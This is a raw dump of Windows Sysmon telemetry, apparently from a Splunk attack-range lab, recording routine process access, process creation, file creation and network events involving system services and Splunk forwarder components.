11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1670-6216-EC04-000000003902}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.431{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1670-6216-EC04-000000003902}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.432{4F8D34B0-1670-6216-EC04-000000003902}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:44.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D5E1DA787D9589F036FF8A0776D189,SHA256=3BF357C13918BC0C0620D17A06D6BDE5819898D7CE8CDBF7A2D180BBB136AC9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:43.670{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49352-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:45.680{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F5F160750581283EA815F9FA5AE4435,SHA256=16939E681BE8EB50D477B1D60119801E44B9DB16928063BB346EC0C0DBC1ECDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220499Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=801785D8B4D52AA5B37E9E86CC7EE020,SHA256=7B6610B6C61926F484732FC599BA9830E27BECCB72E5A66A8C554ACDB597B4CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D649F06D4464943A2909DC1E5B33F5B9,SHA256=8D8310B36A5BF39DCA1896F0BA1A2498C618DAADC43C20FB8BE734D639ADF00E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.868{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0E8178A728B512D24179652039CA35B,SHA256=63B970530902A78E9051274D4D5DC3B8BBC9D6C835818399B51E9B8F761E5A49,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:42.709{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51587-false10.0.1.12-8000- 10341000x8000000000000000220495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.353{4F8D34B0-1671-6216-ED04-000000003902}32761612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1671-6216-ED04-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220489Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220488Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220487Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1671-6216-ED04-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.102{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1671-6216-ED04-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:11:45.103{4F8D34B0-1671-6216-ED04-000000003902}3276C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000296514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.945{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 